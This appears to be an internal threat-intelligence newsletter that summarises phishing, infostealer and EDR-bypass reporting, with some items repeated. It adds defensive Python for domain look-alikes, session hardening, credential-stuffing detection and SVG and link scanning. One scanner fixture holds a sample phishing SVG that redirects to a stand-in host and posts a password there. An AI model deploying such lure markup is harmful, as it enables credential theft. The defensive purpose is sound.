Recent analyses by Perception Point have identified a significant increase in phishing campaigns exploiting Eventbrite's event-management platform. Between July and October 2024, these attacks escalated by 900%, with cybercriminals sending deceptive emails from 'noreply[@]events[.]eventbrite[.]com' to distribute malicious content.

Key Insights:

  • Legitimate Appearance: The emails really are sent by Eventbrite, so sender-authentication checks such as SPF and DKIM pass and the messages look authentic to both filters and recipients. The lure is the attacker-controlled event content and links that Eventbrite delivers on their behalf.

  • Malicious Payloads: The emails often contain links or attachments designed to harvest credentials or deploy malware upon interaction. 

  • Targeted Entities: While the attacks are widespread, they predominantly focus on organizations that frequently use event management platforms, increasing the likelihood of successful exploitation. 

Further Reading: KnowBe4 Blog

Phishing Campaign Impersonates OpenAI to Steal Financial Information 

Cybercriminals are currently conducting a phishing campaign that impersonates OpenAI to deceive users into providing their financial details. The fraudulent emails inform recipients that their ChatGPT subscription payment has been declined, prompting them to click a link to update their payment method. 

Key Insights: 

  • Deceptive Tactics: The emails are designed to appear legitimate, leveraging OpenAI's branding to gain user trust. 

  • Malicious Links: Clicking the provided link directs users to a fake payment page intended to capture sensitive financial information. 

  • Widespread Targeting: This campaign is part of a broader trend where attackers exploit the popularity of AI tools to launch phishing attacks. 

Further Reading: KnowBe4 Blog

Corrupted Word Documents in Novel Phishing Campaign 

A newly identified phishing campaign exploits Microsoft's Word file recovery feature by using intentionally corrupted Word documents as email attachments. These documents evade detection by security solutions due to their damaged state, but Word can still recover and open them. 

Key Insights: 

  • The Lure: Emails impersonate payroll and HR departments, with themes like employee bonuses and benefits. The attachments appear as corrupted files but can be repaired by Word. 

  • Malicious QR Codes: Upon recovery, the documents prompt users to scan a QR code branded with company logos. Scanning leads to phishing sites designed to steal Microsoft login credentials. 

  • Detection Challenges: Most attachments used in this campaign went undetected on platforms like VirusTotal: the damaged container defeats parsing, and what the document contains is an image of a QR code rather than executable content.

  • Attack Effectiveness: By exploiting overlooked document recovery mechanisms, this method bypasses traditional email security filters, increasing the likelihood of reaching victims. 

Further Reading: BleepingComputer Article

Cybercriminals Exploit Search Engine Results to Promote Phishing Pages 

Cybercriminals are increasingly employing search engine poisoning to elevate malicious phishing sites in search results, deceiving users into divulging sensitive information. Researchers at Malwarebytes discovered that a search for "KeyBank login" on Bing displayed a counterfeit KeyBank login page above the official site. 

Key Insights: 

  • Manipulated Search Results: Attackers optimize malicious sites to appear prominently in search results, making them seem legitimate and increasing the likelihood of user interaction. 

  • Phishing Tactics: These fraudulent pages mimic authentic login portals, aiming to harvest users' credentials and personal data. 

  • Broader Implications: This tactic, known as SEO poisoning, extends beyond banking sites, potentially affecting various sectors and services. 

Further Reading: KnowBe4 Blog 
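The two consumer-facing checks in this newsletter, "look at the URL for misspellings or unusual extensions" in the fake-store item and "the counterfeit page sat above the real one" in this SEO-poisoning item, can be turned into a mechanical check. The following is an added example, not code from KnowBe4, Malwarebytes or this newsletter: it classifies a URL against a small brand list as legitimate, look-alike or unknown. The brand table, the confusable-character map and the two-label rule for the registrable domain are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Constructed for this example: brands of interest and the registrable
# domains they really use. In practice, load this from your own inventory.
BRANDS = {
    "keybank": {"keybank.com", "key.com"},
    "paypal": {"paypal.com"},
}

# Single-character swaps attackers use to dodge exact-match blocklists
# (assumed shortlist, not a full Unicode confusables table).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                             "7": "t", "8": "b", "@": "a", "$": "s", "|": "l"})
# Multi-character look-alikes: "rn" renders much like "m", "vv" like "w".
SEQUENCES = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def host_of(url: str) -> str:
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Assumption: no multi-label public
    suffixes such as co.uk; use a public-suffix list in production."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def normalize(text: str) -> str:
    """Fold confusables and separators so 'paypa1.com' and 'keybank-login'
    compare as 'paypalcom' and 'keybanklogin'."""
    text = text.translate(CONFUSABLES)
    for seq, rep in SEQUENCES:
        text = text.replace(seq, rep)
    return text.replace("-", "").replace(".", "")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance by the usual dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str) -> dict:
    """Verdicts: 'legitimate' (registrable domain is on the brand's list),
    'lookalike' (brand name embedded in the host, or one edit away), 'unknown'."""
    host = host_of(url)
    domain = registrable_domain(host)
    sld = domain.rpartition(".")[0] or domain
    result = {"host": host, "domain": domain, "verdict": "unknown", "brand": None, "reason": ""}
    for brand, legit in BRANDS.items():
        if domain in legit:
            return {**result, "verdict": "legitimate", "brand": brand,
                    "reason": "registrable domain is on the brand's list"}
    norm_host, norm_sld = normalize(host), normalize(sld)
    for brand in BRANDS:
        if brand in norm_host:
            # e.g. keybank.com.verify-account.net or keybank-login.com
            return {**result, "verdict": "lookalike", "brand": brand,
                    "reason": f"brand name in host, but registrable domain is {domain}"}
        distance = edit_distance(norm_sld, brand)
        if distance <= 1:
            return {**result, "verdict": "lookalike", "brand": brand,
                    "reason": f"'{sld}' is {distance} edit from '{brand}'"}
    return result
```

The legitimacy test runs first and only on the registrable domain, so a brand name appearing in a subdomain of someone else's domain (keybank.com.verify-account.net) is treated as a look-alike rather than a match. The edit-distance threshold of one is deliberately tight; loosen it only for long brand names, or short brands like "key" will match everything.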

 

 

Attackers Exploit Corrupted Files to Evade Detection 

Cybersecurity researchers have identified a novel phishing campaign that utilizes intentionally corrupted Microsoft Office documents and ZIP archives to bypass email security measures. These corrupted files evade antivirus scans and email filters, yet can be opened by users through built-in recovery features in applications like Microsoft Word and WinRAR. 

Key Insights: 

  • Evasion Techniques: The corrupted state of these attachments prevents security tools from properly scanning them, allowing malicious emails to reach users' inboxes undetected. 

  • User Interaction: When users attempt to open these corrupted files, applications prompt them to recover the content, leading to the display of malicious elements such as QR codes. 

  • Malicious Outcomes: Scanning the embedded QR codes can redirect users to phishing websites designed to steal credentials or deploy malware. 

This tactic highlights the continuous evolution of phishing strategies aimed at circumventing security defenses and exploiting user trust in application recovery features. 

Further Reading: The Hacker News

In News Tags Newsletter, Security Awareness, Phishing, Scams

December 2024 - Threat Intelligence Newsletter

December 5, 2024

This is a monthly newsletter that I share internally with our Cybersecurity team. Feel free to take and use for your own team. Created with the help of ChatGPT.

Google’s New SAIF Risk Assessment Tool for AI Security 

Google has introduced the Secure AI Framework (SAIF) Risk Assessment tool to help organizations proactively identify and mitigate security risks in their AI systems. This interactive tool assesses key areas such as training data integrity, access controls, and defenses against adversarial inputs. Upon completion, organizations receive a tailored report outlining specific vulnerabilities and recommended mitigation strategies, reinforcing the need for robust security measures as AI systems become more prevalent. 

Further Reading: Google Blog on SAIF Risk Assessment

Session Cookie Theft Bypasses MFA Protections 

The FBI has issued a warning about cybercriminals exploiting stolen session cookies to hijack email accounts, effectively bypassing Multi-Factor Authentication (MFA) safeguards. These "Remember-Me" cookies, typically valid for 30 days, store session IDs that authenticate users without repeated logins. If intercepted, attackers can impersonate users, gaining unauthorized access to email accounts and sensitive information. 

Mitigation Strategies: 

  • Monitor Account Activity: Stay vigilant for unfamiliar login attempts or unauthorized changes. 

  • Implement Robust Security Measures: Utilize endpoint protection solutions to detect and prevent infostealer malware, which is the usual way session cookies are taken from a device.

  • Sign Out Rather Than Just Closing the Browser: An explicit sign-out invalidates the session on the server. A remember-me cookie left behind stays valid until it expires, so a copy taken from the device later still works.

Further Reading: Malwarebytes 
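On the service side, the lesson of this warning is that a session cookie is a bearer credential and should be worth as little as possible when stolen. The following is an added example, not code from the FBI notice, Malwarebytes or this newsletter: a session store that keeps only a hash of each token, applies idle and absolute lifetimes (30 days for remember-me, matching the figure above), binds each session to a client fingerprint, and treats a replay from a different client as theft by revoking every session of that user. The fingerprint recipe (user agent plus the IPv4 /24) is an assumption for illustration.

```python
import hashlib
import hmac
import secrets
import time


def fingerprint(user_agent: str, client_ip: str) -> str:
    """Coarse client binding: exact user agent plus the /24 of an IPv4 address.
    Coarser than the full IP so NAT and mobile users survive address changes;
    a replay from a different network still mismatches. (Assumed recipe.)"""
    net = ".".join(client_ip.split(".")[:3]) + ".0/24"
    return hashlib.sha256(f"{user_agent}|{net}".encode()).hexdigest()


class SessionStore:
    def __init__(self, idle_ttl=15 * 60, absolute_ttl=8 * 3600,
                 remember_ttl=30 * 86400, now=time.time):
        self.idle_ttl, self.absolute_ttl, self.remember_ttl = idle_ttl, absolute_ttl, remember_ttl
        self.now = now              # injectable clock so expiry can be tested
        self._sessions = {}         # hashed token -> record

    @staticmethod
    def _key(token: str) -> str:
        # Store only a hash: a leaked session table must not yield usable cookies.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user: str, fp: str, remember: bool = False) -> str:
        token = secrets.token_urlsafe(32)
        t = self.now()
        self._sessions[self._key(token)] = {
            "user": user, "fp": fp, "created": t, "last_seen": t, "remember": remember,
        }
        return token

    def revoke_all(self, user: str) -> int:
        doomed = [k for k, r in self._sessions.items() if r["user"] == user]
        for k in doomed:
            del self._sessions[k]
        return len(doomed)

    def validate(self, token: str, fp: str) -> tuple:
        """Returns ('ok', user) or ('fail', reason)."""
        key = self._key(token)
        rec = self._sessions.get(key)
        if rec is None:
            return "fail", "unknown or revoked token"
        t = self.now()
        lifetime = self.remember_ttl if rec["remember"] else self.absolute_ttl
        if t - rec["created"] > lifetime:
            del self._sessions[key]
            return "fail", "absolute lifetime exceeded"
        if not rec["remember"] and t - rec["last_seen"] > self.idle_ttl:
            del self._sessions[key]
            return "fail", "idle timeout"
        if not hmac.compare_digest(rec["fp"], fp):
            # Valid cookie presented from a different client: assume it was stolen.
            n = self.revoke_all(rec["user"])
            return "fail", f"context mismatch; revoked {n} session(s) for {rec['user']}"
        rec["last_seen"] = t
        return "ok", rec["user"]
```

Binding is a trade-off: user-agent strings change on browser updates and some carriers rotate addresses across /24s, so a mismatch should force re-authentication rather than lock the account. Whatever the lifetime, a remember-me session should still have to pass MFA again before sensitive actions such as changing recovery options or mail-forwarding rules.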

 

 

Sophos Reports Sophisticated China-Based Threats Targeting Network Perimeters 

Sophos recently uncovered a five-year cyber espionage campaign by China-based groups, including APT31 and APT41, that targeted network edge devices like firewalls. These attackers used zero-day vulnerabilities and custom malware to infiltrate and persist within critical infrastructure across the Indo-Pacific region, including energy suppliers, government agencies, and telecommunications. Advanced tactics include stealth operations, sabotaging firewall telemetry, and deploying an early version of a UEFI bootkit on firewall devices. 

Key Insights: 

  • Critical Infrastructure Targeting: Attackers focused on high-value assets, compromising essential services. 

  • Advanced Persistence Tactics: Use of rootkits and stealth malware for long-term access. 

  • Importance of Edge Device Security: Firewalls and perimeter defenses remain primary entry points for these threats. 

Further Reading: Sophos News

Preparing for Emerging AI Risks 

The latest Unit 42 Threat Frontier report highlights the evolving risks associated with generative AI (GenAI) in cybersecurity. As threat actors increasingly explore AI tools to enhance attack methods, traditional defenses like Zero Trust architectures remain essential, but additional AI-focused defenses are becoming critical. The report also emphasizes the growing issue of "Shadow AI," or the unauthorized use of AI tools within organizations, which poses unique security challenges. 

Key Insights: 

  • Shadow AI Risk: Unauthorized use of AI tools within organizations increases security vulnerabilities. 

  • AI-Specific Defenses: Integrating AI-focused security measures early in development is essential for robust protection. 

  • Continued Importance of Traditional Defenses: Zero Trust and other established architectures are still effective but need AI-specific adaptations. 

Further Reading: Unit 42 - Palo Alto Networks

Extortion Actor's EDR Bypass Attempt Unveiled 

Unit 42 recently investigated an extortion incident where threat actors attempted to bypass Endpoint Detection and Response (EDR) systems using a tool named "disabler.exe." Derived from the publicly available EDRSandBlast, the tool was built to strip the EDR's hooks from user-mode libraries and its kernel-mode callbacks, blinding the agent so that later activity goes unrecorded. The attackers tested it on rogue systems running outdated Cortex XDR agents, inadvertently exposing their toolkit and operations; that exposure allowed Unit 42 to trace the tool's sale on cybercrime forums and identify one of the threat actors involved.

Key Insights: 

  • Advanced Evasion Techniques: Attackers are employing sophisticated tools to disable security mechanisms, highlighting the need for robust and up-to-date EDR solutions. 

  • Operational Exposure: Testing malicious tools in uncontrolled environments can inadvertently reveal threat actor methodologies and identities. 

  • Community Vigilance: Monitoring cybercrime forums and sharing intelligence are crucial for preempting and mitigating such threats. 

Further Reading: Unit 42 - Palo Alto Networks

Surge in Fake Emergency Data Requests 

The FBI has issued a warning to U.S. organizations about a rise in fraudulent emergency data requests (EDRs, not to be confused with endpoint detection and response) by cybercriminals. These malicious actors compromise government email accounts to impersonate law enforcement, exploiting the urgency of EDRs to obtain sensitive user information from service providers without legal oversight.

Key Insights: 

  • Tactics: Cybercriminals gain access to official email accounts, enabling them to submit convincing EDRs to companies, thereby bypassing standard legal procedures. 

  • Motivations: The harvested data is often used for further criminal activities, including identity theft, financial fraud, and targeted cyberattacks. 

  • Indicators of Compromise: Unusual or unexpected data requests, especially those marked as urgent, should be scrutinized for authenticity. 

Recommendations: 

  • Verification Protocols: Implement strict verification processes for all data requests, including direct confirmation with the requesting agency through known contact points. 

  • Employee Training: Educate staff on the prevalence of fake EDRs and establish clear procedures for handling such requests. 

  • Monitoring and Reporting: Continuously monitor for suspicious data requests and report any fraudulent attempts to the appropriate authorities. 

Staying vigilant against these deceptive tactics is crucial to safeguarding sensitive information and maintaining trust with users. 

Further Reading: SecurityWeek

The Credential Abuse Cycle 

Recent analyses have highlighted the escalating threat of credential abuse, where cybercriminals exploit stolen usernames and passwords to infiltrate networks and access sensitive data. This cycle comprises three key stages: theft, trade, and exploitation. 

Key Insights: 

  • Credential Theft: Attackers acquire credentials through data breaches, malware (notably infostealers), and social engineering. 

  • Underground Trading: Stolen credentials are sold on cybercriminal forums, specialized marketplaces, and messaging platforms like Telegram. 

  • Exploitation: With these credentials, threat actors conduct account takeovers, credential stuffing, and valid account abuse, leading to data breaches and financial losses. 

Further Reading: ReliaQuest Blog 
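The exploitation stage of this cycle leaves a recognizable shape in authentication logs, and a detection for it is the piece a SOC will want. The following is an added example, not code from ReliaQuest or this newsletter, run over constructed log lines in an assumed format: it separates a credential-stuffing source (one address, many distinct users, mostly failures) from a distributed attack on a single account, and lists the accounts that actually succeeded from a stuffing source, because those are the stolen pairs that worked. Thresholds are illustrative.

```python
import re
from collections import defaultdict

# Assumed log format for this example; adapt the pattern to your identity provider.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>success|failure) user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)

# Constructed sample: one stuffing source, one normal user, one sprayed admin account.
SAMPLE_LOG = """\
2024-11-02T08:00:01Z auth success user=alice ip=198.51.100.5
2024-11-02T08:00:04Z auth failure user=alice ip=203.0.113.9
2024-11-02T08:00:05Z auth failure user=bob ip=203.0.113.9
2024-11-02T08:00:05Z auth failure user=carol ip=203.0.113.9
2024-11-02T08:00:06Z auth failure user=dave ip=203.0.113.9
2024-11-02T08:00:06Z auth failure user=erin ip=203.0.113.9
2024-11-02T08:00:07Z auth failure user=frank ip=203.0.113.9
2024-11-02T08:00:07Z auth success user=grace ip=203.0.113.9
2024-11-02T08:01:10Z auth failure user=admin ip=192.0.2.10
2024-11-02T08:01:11Z auth failure user=admin ip=192.0.2.11
2024-11-02T08:01:12Z auth failure user=admin ip=192.0.2.12
2024-11-02T08:01:13Z auth failure user=admin ip=192.0.2.13
2024-11-02T08:01:14Z auth failure user=admin ip=192.0.2.14
2024-11-02T08:05:00Z auth failure user=bob ip=198.51.100.6
2024-11-02T08:05:09Z auth success user=bob ip=198.51.100.6
"""


def parse(lines):
    """Yield one dict per well-formed line; silently skip anything else."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()


def detect(events, min_failures=5, min_distinct_users=5, min_distinct_ips=5) -> dict:
    per_ip = defaultdict(lambda: {"failures": 0, "users": set(), "successes": set()})
    failing_ips_per_user = defaultdict(set)
    for e in events:
        st = per_ip[e["ip"]]
        if e["result"] == "failure":
            st["failures"] += 1
            st["users"].add(e["user"])
            failing_ips_per_user[e["user"]].add(e["ip"])
        else:
            st["successes"].add(e["user"])
    # One source trying many different accounts: stuffing a breach dump.
    stuffing_sources = sorted(
        ip for ip, st in per_ip.items()
        if st["failures"] >= min_failures and len(st["users"]) >= min_distinct_users
    )
    # Any success from such a source means that credential pair is valid: reset it.
    accounts_to_reset = sorted({u for ip in stuffing_sources for u in per_ip[ip]["successes"]})
    # One account failing from many sources: distributed guessing or spraying via proxies.
    targeted_accounts = sorted(
        u for u, ips in failing_ips_per_user.items() if len(ips) >= min_distinct_ips
    )
    return {
        "stuffing_sources": stuffing_sources,
        "accounts_to_reset": accounts_to_reset,
        "targeted_accounts": targeted_accounts,
    }
```

In production the same counters would be kept over a sliding window and keyed on the source as seen behind any load balancer, otherwise every user collapses into one address and the per-source signal disappears. The "accounts to reset" list is the actionable output: those users' passwords are known to an attacker even though the login looked like a success.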

 

 

Rise in SVG-Based Phishing Attacks 

Cybercriminals are increasingly utilizing Scalable Vector Graphics (SVG) files in phishing emails to bypass security filters and deliver malicious content. Unlike raster image formats, an SVG is XML that can carry embedded JavaScript and HTML, and on a typical Windows system an .svg attachment opens in the default browser, so that script runs as soon as the file is opened.

Key Insights: 

  • Evasion Techniques: SVG files are often overlooked by email security systems, enabling malicious payloads to reach recipients undetected. 

  • Embedded Malware: Attackers embed JavaScript within SVG files to initiate redirects to phishing sites or to download malware onto the victim's device. 

  • Increased Prevalence: There is a notable uptick in phishing campaigns leveraging SVG attachments. Two practical controls: quarantine or block SVG attachments at the mail gateway unless your organization genuinely exchanges them, and change the default file association so .svg opens in an image viewer or text editor rather than a browser, which removes the script-execution path.

Further Reading: Bleeping Computer 
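Because the dangerous part of a phishing SVG is a short list of XML constructs (script, event-handler attributes, script and data URIs, embedded HTML, outbound links), a gateway can triage the attachment statically. The following is an added example, not code from BleepingComputer or this newsletter; both SVG samples are constructed for it, and the blocking policy is an assumption.

```python
import re
import xml.etree.ElementTree as ET

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)            # onload, onclick, ...
ACTIVE_URI = re.compile(r"^\s*(javascript|vbscript)\s*:", re.IGNORECASE)
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "form", "input"}


def _local(name: str) -> str:
    """Strip the XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list:
    """Return a list of findings; an empty list means nothing active was found."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # A lenient browser may still render malformed XML, so this is not "clean".
        return [f"unparseable XML ({exc})"]
    findings = []
    for el in root.iter():
        if not isinstance(el.tag, str):      # comments / processing instructions
            continue
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            a = _local(attr)                 # handles xlink:href as well as href
            if EVENT_ATTR.match(a):
                findings.append(f"event handler {a} on <{name}>")
            elif a == "href" and ACTIVE_URI.match(value):
                findings.append(f"{value.split(':', 1)[0].strip().lower()}: URI on <{name}>")
            elif a == "href" and value.lstrip().lower().startswith("data:"):
                # Embedded raster images are normal; data: HTML or nested SVG is not.
                mime = value.lstrip()[5:].split(",", 1)[0].split(";", 1)[0].lower()
                if not mime.startswith("image/") or "svg" in mime:
                    findings.append(f"data: URI carrying {mime or 'unknown type'} on <{name}>")
            elif a == "href" and value.lower().startswith(("http://", "https://")):
                findings.append(f"outbound link {value} on <{name}>")
            elif a == "http-equiv" and value.lower() == "refresh":
                findings.append(f"meta refresh redirect on <{name}>")
    return findings


def triage(data: bytes) -> tuple:
    """Assumed policy: any active content in an attached SVG blocks the message."""
    findings = scan_svg(data)
    return ("block" if findings else "allow"), findings


# Constructed samples: a plain icon, and a lure of the kind described in the item above.
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">'
    b'<rect width="16" height="16" fill="#c00"/></svg>'
)
LURE_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" '
    b'onload="top.location=\'https://login-verify.example/\'">'
    b'<script><![CDATA[window.location = "https://login-verify.example/";]]></script>'
    b'<a xlink:href="https://login-verify.example/doc"><text y="20">Open document</text></a>'
    b'<foreignObject width="300" height="200"><body xmlns="http://www.w3.org/1999/xhtml">'
    b'<form action="https://login-verify.example/post"><input name="password"/></form>'
    b'</body></foreignObject></svg>'
)
```

The scanner deliberately treats parse failures as suspicious rather than clean, since the point of the campaign is that the file looks like an image to tooling that does not read it. Legitimate SVGs from design tools rarely carry any of these constructs, so the false-positive rate of a block policy is low; where it is not, downgrade outbound links to a warning and keep script, event handlers and foreignObject as hard blocks.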

 

 

2024 CWE Top 25 Most Dangerous Software Weaknesses Released 

The Common Weakness Enumeration (CWE) has published its 2024 list of the Top 25 Most Dangerous Software Weaknesses. This annual compilation identifies the most prevalent and critical vulnerabilities that can lead to severe security breaches, including system takeovers, data theft, and application disruptions. 

Key Highlights: 

  • Top Vulnerabilities: The list features critical weaknesses such as Cross-Site Scripting (CWE-79), Out-of-Bounds Write (CWE-787), and SQL Injection (CWE-89). 

  • Data Insights: The 2024 list is based on an analysis of 31,770 CVE Records, providing a comprehensive overview of current software security challenges. 

  • Resource for Mitigation: The CWE Top 25 serves as a valuable resource for developers and security professionals to prioritize mitigation efforts and enhance software security practices. 

Further Reading: CWE Top 25 Most Dangerous Software Weaknesses

Analysis of CISA's 2023 Top Exploited Vulnerabilities 

The Cybersecurity and Infrastructure Security Agency (CISA) has released its 2023 report on the most routinely exploited vulnerabilities, providing critical insights into the threat landscape. An in-depth analysis by VulnCheck offers additional perspectives on these vulnerabilities, emphasizing their exploitation patterns and associated threat actors. 

Key Insights: 

  • Exploit Availability: Out of the 15 vulnerabilities highlighted, 14 have eight or more publicly available proof-of-concept (POC) exploits, indicating a high risk of exploitation. 

  • Weaponized Exploits: Thirteen vulnerabilities have weaponized exploits, with five being weaponized before any public evidence of exploitation emerged. 

  • Threat Actor Activity: Sixty named threat actors are linked to 13 of these vulnerabilities. Notably, North Korea's Silent Chollima group targeted nine of the listed vulnerabilities. 

  • Detection Coverage: VulnCheck provides Initial Access artifacts for 12 of the 15 vulnerabilities, aiding defenders in identifying and mitigating potential threats. 

Further Reading: VulnCheck Blog

Surge in Eventbrite-Based Phishing Attacks 

Recent analyses by Perception Point have identified a significant increase in phishing campaigns exploiting Eventbrite's event-management platform. Between July and October 2024, these attacks escalated by 900%, with cybercriminals sending deceptive emails from 'noreply[@]events[.]eventbrite[.]com' to distribute malicious content.

Key Insights:

  • Legitimate Appearance: The emails really are sent by Eventbrite, so sender-authentication checks such as SPF and DKIM pass and the messages look authentic to both filters and recipients. The lure is the attacker-controlled event content and links that Eventbrite delivers on their behalf.

  • Malicious Payloads: The emails often contain links or attachments designed to harvest credentials or deploy malware upon interaction. 

  • Targeted Entities: While the attacks are widespread, they predominantly focus on organizations that frequently use event management platforms, increasing the likelihood of successful exploitation. 

Further Reading: KnowBe4 Blog 
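The Eventbrite campaign here, its twin in the security-awareness newsletter above, and the DocuSign invoice item share one property: sender authentication passes because the platform genuinely sent the mail, so the only thing left to inspect is the content. The following is an added example, not code from KnowBe4, Perception Point or this newsletter: once the sender's registrable domain is recognized as a platform, it extracts every URL from the body and reports those whose registrable domain is not one the platform itself uses. The platform allowlist, the two-label domain rule and the sample messages are assumptions constructed for illustration; note that it addresses the Eventbrite pattern (a platform relaying an attacker's link) and not a DocuSign lure whose links stay on DocuSign, where the signal is the payment instructions in the document itself.

```python
import email
import email.utils
import re
from email import policy
from urllib.parse import urlsplit

# Assumed: registrable sender domain -> link domains that platform legitimately emits.
# Build yours from observed legitimate mail; this table is for illustration only.
PLATFORM_LINK_DOMAINS = {
    "eventbrite.com": {"eventbrite.com"},
    "docusign.net": {"docusign.net", "docusign.com"},
}
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def registrable(host: str) -> str:
    """Last two labels. Assumption: no multi-label public suffixes (co.uk etc.)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def off_platform_links(raw: bytes) -> dict:
    """Parse one RFC 5322 message and report body links that leave the sending platform."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    _, addr = email.utils.parseaddr(msg.get("From", ""))
    sender = registrable(addr.rpartition("@")[2]) if "@" in addr else ""
    allowed = PLATFORM_LINK_DOMAINS.get(sender)
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body is not None else ""
    links = {registrable(urlsplit(u).hostname or "") for u in URL_RE.findall(text)}
    links.discard("")
    if allowed is None:
        # Not platform mail: this check does not apply; other controls do.
        return {"sender": sender, "platform_mail": False,
                "off_platform": sorted(links), "verdict": "not-applicable"}
    off = sorted(links - allowed)
    return {"sender": sender, "platform_mail": True,
            "off_platform": off, "verdict": "review" if off else "allow"}


# Constructed samples: a relayed lure and a genuine-looking ticket notification.
LURE = (
    b"From: Eventbrite <noreply@events.eventbrite.com>\r\n"
    b"To: victim@example.com\r\n"
    b"Subject: Action required: payroll verification event\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"\r\n"
    b"<html><body><p>You are invited.</p>"
    b'<a href="https://www.eventbrite.com/e/123456">View event</a> '
    b'<a href="https://payroll-verify.example/login">Confirm your details</a>'
    b"</body></html>\r\n"
)
CLEAN = (
    b"From: Eventbrite <noreply@events.eventbrite.com>\r\n"
    b"To: attendee@example.com\r\n"
    b"Subject: Your ticket\r\n"
    b"Content-Type: text/plain; charset=utf-8\r\n"
    b"\r\n"
    b"Your ticket: https://www.eventbrite.com/e/654321\r\n"
)
```

A "review" verdict is a triage signal, not proof of phishing, because platforms do legitimately relay organizer links; the value is that it surfaces the small minority of platform mail that points somewhere new, which is exactly the population these campaigns live in. The check should run after DMARC evaluation, since it assumes the From domain is truthful.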

 

 

Large-Scale Phishing Campaign Deploys Rhadamanthys Stealer v0.7 

Check Point Research has identified a significant phishing operation utilizing the latest version of the Rhadamanthys Stealer, known as Rhadamanthys.07. This campaign, dubbed "CopyRh(ight)adamantys," impersonates legitimate companies to distribute malware under the guise of copyright infringement notices.  

Key Insights: 

  • Phishing Tactics: Attackers send emails from Gmail accounts, alleging copyright violations on the recipient's social media pages, prompting them to download a file that initiates the malware infection. 

  • Global Reach: The campaign targets individuals and organizations across multiple continents, with approximately 70% of impersonated companies belonging to the entertainment, media, technology, and software sectors. 

  • Malware Capabilities: Rhadamanthys.07 includes features such as AI-powered optical character recognition (OCR) modules, enhancing its ability to extract data from infected machines. 

Further Reading: Check Point Blog

Corrupted Word Documents in Novel Phishing Campaign 

A newly identified phishing campaign exploits Microsoft's Word file recovery feature by using intentionally corrupted Word documents as email attachments. These documents evade detection by security solutions due to their damaged state, but Word can still recover and open them. 

Key Insights: 

  • The Lure: Emails impersonate payroll and HR departments, with themes like employee bonuses and benefits. The attachments appear as corrupted files but can be repaired by Word. 

  • Malicious QR Codes: Upon recovery, the documents prompt users to scan a QR code branded with company logos. Scanning leads to phishing sites designed to steal Microsoft login credentials. 

  • Detection Challenges: Most attachments used in this campaign went undetected on platforms like VirusTotal: the damaged container defeats parsing, and what the document contains is an image of a QR code rather than executable content.

  • Attack Effectiveness: By exploiting overlooked document recovery mechanisms, this method bypasses traditional email security filters, increasing the likelihood of reaching victims. 

Further Reading: BleepingComputer Article

Surge in Infostealer Malware Exploiting Innovative Attack Vectors 

In October 2024, Check Point Research identified a significant increase in infostealer malware activity, with cybercriminals employing advanced tactics to infiltrate systems and exfiltrate sensitive data.  

Key Insights: 

  • Prevalent Malware Families: The top threats included FakeUpdates, impacting 6% of organizations worldwide, followed by Androxgh0st at 5%, and AgentTesla at 4%.  

  • Innovative Attack Vectors: Threat actors are leveraging sophisticated methods, such as malicious advertisements in search results—a tactic known as "malvertising"—to distribute infostealers. This approach enhances the legitimacy of malicious links, increasing the likelihood of user engagement.  

  • Global Impact: The widespread distribution of these malware families underscores the necessity for organizations to adopt proactive and adaptive security measures to counter evolving cyber threats. 

Further Reading: Check Point Blog

Attackers Exploit Corrupted Files to Evade Detection 

Cybersecurity researchers have identified a novel phishing campaign that utilizes intentionally corrupted Microsoft Office documents and ZIP archives to bypass email security measures. These corrupted files evade antivirus scans and email filters, yet can be opened by users through built-in recovery features in applications like Microsoft Word and WinRAR. 

Key Insights: 

  • Evasion Techniques: The corrupted state of these attachments prevents security tools from properly scanning them, allowing malicious emails to reach users' inboxes undetected. 

  • User Interaction: When users attempt to open these corrupted files, applications prompt them to recover the content, leading to the display of malicious elements such as QR codes. 

  • Malicious Outcomes: Scanning the embedded QR codes can redirect users to phishing websites designed to steal credentials or deploy malware. 

This tactic highlights the continuous evolution of phishing strategies aimed at circumventing security defenses and exploiting user trust in application recovery features. 

Further Reading: The Hacker News 
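This item and the "Corrupted Word Documents" item above describe the same trick from two sources: a file that archive parsers reject but that Word or WinRAR will offer to recover. The control that follows from it is that "unscannable" must not be treated as "clean". The following is an added example, not code from The Hacker News, BleepingComputer or this newsletter: a gateway-side triage that builds a minimal OOXML-shaped archive, damages its trailer the way the campaign's files are damaged, and shows that the damaged copy still carries the ZIP magic bytes yet cannot be enumerated, which is the condition to quarantine on. The sample archive and the corruption step are constructed; they are not campaign samples.

```python
import io
import zipfile

# Attachment extensions that are ZIP containers underneath.
CONTAINER_EXTS = {"docx", "docm", "xlsx", "xlsm", "pptx", "zip"}


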